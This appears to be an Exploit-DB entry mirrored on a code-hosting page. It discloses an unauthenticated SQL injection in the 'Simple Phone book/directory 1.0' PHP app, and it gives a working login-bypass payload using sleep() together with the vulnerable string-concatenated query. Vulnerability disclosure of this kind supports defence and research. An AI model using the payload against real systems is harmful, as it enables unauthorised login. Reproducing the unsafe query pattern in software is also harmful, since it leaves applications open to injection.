bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50223.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

25 lines
No EOL
783 B
Text
Raw Blame History

# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
# Date: 21/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## SQL Injection
# Vulnerable page
http://localhost/PhoneBook/index.php
# Vulnerable paramater
username1 & password
# POC
Username = ' or sleep(5)='-- -
Password = ' '
Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
# Vulnerable Code
index.php line 13
$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
Reference in a new issue View git blame Copy permalink